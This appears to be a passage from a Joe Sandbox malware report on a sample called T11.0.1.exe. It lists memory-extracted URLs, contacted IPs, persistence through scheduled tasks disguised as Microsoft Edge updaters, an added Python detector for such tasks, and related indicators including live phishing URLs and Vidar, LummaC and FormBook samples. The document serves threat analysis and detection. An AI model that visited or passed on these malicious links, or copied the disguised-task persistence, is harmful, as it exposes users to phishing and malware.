http://ocsp.thawte.com0 | T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B5B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799411886.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799216805.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1797806840.000001F51FAD2000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1797806840.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1832667722.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1835274522.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1832667722.000001E3DC93E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.python.org/ | T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1668074546.0000029E6BF35000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.micom/pkiops/Docs/ry.htm0 | powershell.exe, 00000002.00000002.1833400223.000001C17CD55000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader | T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713707881.0000029E6BE7B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667988200.0000029E6BEDC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BEBB000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BED2000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713338433.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713963632.0000029E6DFF3000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713432924.0000029E6DFF3000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713807345.0000029E6BEAC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000002.1716654117.0000029E6BEAD000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666476945.0000029E6BEBB000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666122628.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000004.00000002.1844983606.0000029158155000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000004.00000002.1844983606.0000029158155000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 00000033.00000003.2369019176.000001FD3C8A3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713707881.0000029E6BE7B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667988200.0000029E6BEDC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BEBB000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BED2000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713338433.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713963632.0000029E6DFF3000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713432924.0000029E6DFF3000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713807345.0000029E6BEAC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000002.1716654117.0000029E6BEAD000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666476945.0000029E6BEBB000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666122628.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://dl.delivery.mp.microsoft. | SetupHost.exe, 0000000D.00000003.2210652706.0000000005E2F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl3.digi | T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658955506.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787538248.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1830735495.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.python.org/download/releases/2.3/mro/. | T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667354328.0000029E6BF22000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667503469.0000029E6BF22000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000002.1717803680.0000029E6DE20000.00000004.00001000.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667503469.0000029E6BF10000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667354328.0000029E6BF10000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667582669.0000029E6BF25000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667484908.0000029E6BF24000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1808072260.0000026E04CCD000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1808023262.0000026E04CB9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000014.00000003.1853788787.000001C5F4DD6000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000014.00000003.1853996654.000001C5F4DE7000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000014.00000003.1853788787.000001C5F4DE7000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000014.00000003.1854109025.000001C5F4DE9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000014.00000003.1853855705.000001C5F4DE9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000014.00000003.1853996654.000001C5F4DD6000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy | T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713707881.0000029E6BE7B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667988200.0000029E6BEDC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BEBB000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BED2000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713338433.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713963632.0000029E6DFF3000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713432924.0000029E6DFF3000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713807345.0000029E6BEAC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000002.1716654117.0000029E6BEAD000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666476945.0000029E6BEBB000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666122628.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://g.live.com/odclientsettings/Prod.C: | svchost.exe, 00000033.00000003.2369019176.000001FD3C856000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://g.live.com/odclientsettings/ProdV2 | svchost.exe, 00000033.00000003.2369019176.000001FD3C8C2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.thawte.com/ThawteTimestampingCA.crl0 | T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B5B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799411886.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799216805.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1797806840.000001F51FAD2000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1797806840.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1832667722.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1835274522.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1832667722.000001E3DC93E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 00000033.00000003.2369019176.000001FD3C8C2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.1745831815.000001C100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000004.00000002.1844983606.0000029158155000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1809266140.000001C110073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1844983606.0000029158155000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.openssl.org/H | T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799411886.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1835274522.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://osoft.com/pki/ceooCerAut_2010-06 | powershell.exe, 00000004.00000002.1859895132.00000291602ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://dl.delivery.mp.mi% | SetupHost.exe, 0000000D.00000003.2210652706.0000000005E2F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1745831815.000001C100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1749348484.00000291480E1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.python.org/dev/peps/pep-0205/ | T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1663127359.0000021C65B53000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713568824.0000029E6BF2B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713889957.0000029E6BF2C000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713338433.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000002.1716980928.0000029E6BF2C000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1802194681.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1808982192.0000026E04CA1000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1839491806.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py | SystemUpdate.exe, 00000014.00000003.1853082415.000001C5F4D98000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1745831815.000001C100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1749348484.00000291480E1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 00000033.00000003.2369019176.000001FD3C8C2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.181.68 | www.google.com | United States | 15169 | GOOGLEUS | false
8.212.101.195 | unknown | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
239.255.255.250 | unknown | Reserved | unknown | unknown | false
152.199.21.175 | sni1gl.wpc.alphacdn.net | United States | 15133 | EDGECASTUS | false
Private IPs: 192.168.2.4, 127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581935
Start date and time: 2024-12-29 13:38:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 92
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: T1#U52a9#U624b1.0.1.exe (renamed because original name is a hash value)
Original Sample Name: T11.0.1.exe
Detection: MAL
Classification: mal48.evad.winEXE@174/352@28/6
EGA Information:
• Successful, ratio: 57.1%
HCA Information:
• Successful, ratio: 67%
• Number of executed functions: 186
• Number of non-executed functions: 206
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.106.86.13, 184.28.89.167, 199.232.214.172, 104.122.214.66, 192.229.221.95, 23.212.89.111, 172.217.19.227, 142.250.181.142, 64.233.161.84, 172.217.17.46, 184.28.90.27, 88.221.169.152, 104.102.52.100, 2.18.64.214, 2.18.64.205, 104.122.214.103, 13.89.179.8, 2.18.64.20, 2.18.64.21, 118.214.130.157, 20.190.177.149, 20.190.147.3, 20.190.177.146, 20.190.147.1, 20.190.147.4, 20.190.147.6, 20.190.147.5, 20.190.147.0, 184.28.89.29, 172.217.19.170, 172.217.17.74, 172.217.19.202, 172.217.21.42, 172.217.19.234, 172.217.17.42, 142.250.181.138, 142.250.181.106, 142.250.181.74, 2.20.62.102, 20.190.177.82, 20.190.147.12, 20.190.147.2, 20.190.177.19, 20.190.177.147, 52.167.30.171, 152.199.19.161, 4.245.163.56, 20.12.23.50, 13.107.246.63
• Excluded domains from analysis (whitelisted): greenid-prod-pme.eastus2.cloudapp.azure.com, dl.delivery.mp.microsoft.com, lgincdnmsftuswe2.azureedge.net, pme-greenid-prod.trafficmanager.net, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, cn-assets.adobedtm.com.edgekey.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, ak.privatelink.msidentity.com, e11290.dspg.akamaiedge.net, offertoolproduction.azureedge.net, www.microsoft.com-c-3.edgekey.net, dlc-shim.trafficmanager.net, e12671.dscd.akamaiedge.net, clients2.google.com, ocsp.digicert.com, atm-settingsfe-prod-geo2.trafficmanager.net, download.microsoft.com.edgekey.net, star-azurefd-prod.trafficmanager.net, login.live.com, main.dl.ms.akadns.net, e16604.g.akamaiedge.net, download.microsoft.com, acctcdnvzeuno.azureedge.net, dl.delivery.mp.microsoft.com.delivery.microsoft.com, acctcdnvzeuno.ec.azureedge.net, san-ion.secure4.scene7.com.edgekey.net, fpt2.microsoft.com, fs.microsoft.com, acctcdn
• Execution Graph export aborted for target LineInst.exe, PID 7804 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 7404 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7544 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
07:39:01 | API Interceptor | 52x Sleep call for process: powershell.exe modified
07:39:13 | API Interceptor | 1x Sleep call for process: SetupHost.exe modified
07:40:07 | API Interceptor | 2x Sleep call for process: svchost.exe modified
12:39:06 | Task Scheduler | Run new task: MicrosoftEdgeUpdatesOnce path: C:\Users\user\AppData\Roaming\../LineInst.exe
12:39:06 | Task Scheduler | Run new task: MicrosoftEdgeUpdatesOnceMe path: C:\Users\user\AppData\Roaming\../WinHex.exe
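The two Task Scheduler events are the persistence worth triaging: both task names imitate Microsoft Edge updater tasks, yet the action paths resolve, through the `Roaming\..` traversal, to LineInst.exe and WinHex.exe sitting directly in the user's AppData directory. The Python below is an added example written for this report, not Joe Sandbox code or a Joe Sandbox signature: it parses "Run new task" timeline entries, normalizes the action path with ntpath so the traversal is collapsed, and flags the traversal, the user-writable location and the vendor-style name. The input is constructed from the report's two entries plus one made-up benign Edge updater task as a control; the directory markers, vendor keywords and trusted roots are this example's own assumptions. On a live host the same name/path pairs would come from `schtasks /query /v /fo CSV` or PowerShell's `Get-ScheduledTask`.

```python
import ntpath
import re
from dataclasses import dataclass, field

# Constructed input: the two "Run new task" events from this report's behaviour
# timeline, plus one made-up benign Edge updater task (not from the report) as a
# control that the checks must leave alone.
TIMELINE = [
    r"12:39:06 | Task Scheduler | Run new task: MicrosoftEdgeUpdatesOnce path: C:\Users\user\AppData\Roaming\../LineInst.exe",
    r"12:39:06 | Task Scheduler | Run new task: MicrosoftEdgeUpdatesOnceMe path: C:\Users\user\AppData\Roaming\../WinHex.exe",
    r"12:40:00 | Task Scheduler | Run new task: MicrosoftEdgeUpdateTaskMachineUA path: C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe",
]

TASK_RE = re.compile(r"Run new task: (?P<name>\S+) path: (?P<path>.+?)\s*$")

# Assumed heuristics (this example's own, not a Joe Sandbox rule):
# directories a standard user can write to, name fragments borrowed from
# legitimate updater tasks, and the roots where real vendor updaters live.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\programdata\\", "\\temp\\")
VENDOR_WORDS = ("microsoft", "edge", "google", "update", "adobe")
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")


@dataclass
class Finding:
    name: str
    raw_path: str
    resolved: str
    reasons: list = field(default_factory=list)


def normalize(path: str) -> str:
    """Collapse '..' segments and accept '/' as a separator, the way Windows
    path normalization will when the task runs, then lowercase for matching."""
    return ntpath.normpath(path.replace("/", "\\")).lower()


def assess(name: str, path: str) -> Finding:
    """Apply the three checks to one task name/action path pair."""
    finding = Finding(name, path, normalize(path))
    segments = path.replace("/", "\\").split("\\")
    if ".." in segments:
        finding.reasons.append("parent-directory traversal in action path")
    if any(marker in finding.resolved for marker in USER_WRITABLE):
        finding.reasons.append("binary lives in a user-writable directory")
    if any(w in name.lower() for w in VENDOR_WORDS) and not finding.resolved.startswith(TRUSTED_ROOTS):
        finding.reasons.append("vendor-style task name but binary outside Program Files/Windows")
    return finding


def parse_timeline(lines):
    """Pull every 'Run new task' event out of timeline lines and assess it."""
    findings = []
    for line in lines:
        m = TASK_RE.search(line)
        if m:
            findings.append(assess(m.group("name"), m.group("path")))
    return findings


def suspicious(lines):
    """Only the tasks that tripped at least one check."""
    return [f for f in parse_timeline(lines) if f.reasons]


if __name__ == "__main__":
    for f in suspicious(TIMELINE):
        print(f"{f.name}: {f.raw_path} -> {f.resolved}")
        for reason in f.reasons:
            print("   -", reason)
```

Run against the constructed input, both report tasks trip all three checks (resolved paths `c:\users\user\appdata\lineinst.exe` and `c:\users\user\appdata\winhex.exe`) while the control task under Program Files (x86) trips none. The traversal check works on the raw path on purpose: once a scheduler has stored the path, `..` in an action is itself a signal, independent of where it ends up.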
Columns: Associated Sample Name / URL | Detection | Threat Name | Context

Match: 239.255.255.250
Tool_Unlock_v1.2.exe | malicious | Vidar
https://gtgyhtrgerftrgr.blob.core.windows.net/frhvhgse/vsgwhk.html | malicious | Unknown
https://its.piquedigital.com.br/maryland.gov/&adfs/ls/client-request-id=7c724&wa=wsignin10.html | malicious | Unknown
https://belasting.online-factuur.com | malicious | Unknown
https://kn0wbe4.compromisedblog.com/XZHJISTcycW1tZkROWG92Y2ZEc21laS80dzNTR2N0eEsvTDFRWGFNODdGaGtjNGo5VzRyMFRUQmFLM0grcGxUbnBSTVFhMEg2Smd3UkovaXVjaUpIcG1hZG5CQnh5aFlZTXNqNldTdm84cE5CMUtld0dCZzN4ZUFRK2lvL1FWTG92NUJsMnJ3OHFGckdTNFhnMkFUTFZFZTdKRnVJaTRuRGFKdXVyeUdCVytuQzdnMEV1ZExSMnlwWi9RPT0tLTdnZjhxQVZPbUdTdFZXVUEtLXA0bHNCNGxmeTdrdmlkWWRVcmRXRWc9PQ==?cid=2310423310 | malicious | KnowBe4
FB.html | malicious | Unknown
https://app.slintel-privacy.com/links/J95tSop4o/SS6JytVVw/qm84IUL58/GFC-9kqk1- | malicious | Unknown
http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfh | malicious | Unknown
http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h | malicious | HTMLPhisher
l0zocrLiVW.exe | malicious | LummaC

Match: 152.199.21.175
SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe | malicious | FormBook | www.ballthingsez.com/co63/
http://cdn.ayc0zsm69431gfebd.xyz | malicious | Unknown | cdn.ayc0zsm69431gfebd.xyz/favicon.ico
http://cdn.ayc0zsm69431gfebd.xyz | malicious | Unknown | cdn.ayc0zsm69431gfebd.xyz/favicon.ico
yx8DBT3r5r.exe | malicious | Unknown | www.mobilityconsignment.com/W4C1yQ.php?m=xl59elj25q8m
Columns: Associated Sample Name / URL | Detection | Threat Name | Context

Match: sni1gl.wpc.alphacdn.net
phish_alert_iocp_v1.4.48 - 2024-12-11T151927.331.eml | malicious | Unknown | 152.199.21.175
https://earthfor.es/Alg&d=DwMFaQ | malicious | HTMLPhisher | 152.199.21.175
https://earthfor.es/Alg&d=DwMFaQ | malicious | HTMLPhisher | 152.199.21.175
https://18QDy4sM2G.lomidore.ru/baSDU4o/#Daccounting@harborwholesale.com | malicious | Unknown | 152.199.21.175
View_alert_details_#[01KTO].html | malicious | Unknown | 152.199.21.175
https://sgwarch-my.sharepoint.com/:f:/p/setup1/EiozDTFdgcdOj57XSlxa0wgB_yucGXpVtBz0YeRUUS4djA?e=J1BMm6&xsdata=MDV8MDJ8bG9nYW5AaG9sdHhwLmNvbXw4NzViY2I1MjBhNzQ0NjAxMGYxODA4ZGQxODZlODVlN3w0Y2NhZDYyOTg3ZWM0MmRmOTU3YTYxMmI0OTU2YmE3NXwwfDB8NjM4NjkzNTg1MTc0NTY1ODEyfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=cmt5N3BwOXR0VGIwbDEyNWFnZmRKYVBMMzhQVUJ4bmJpNnppZGtydXJjST0%3d | malicious | HTMLPhisher | 152.199.21.175
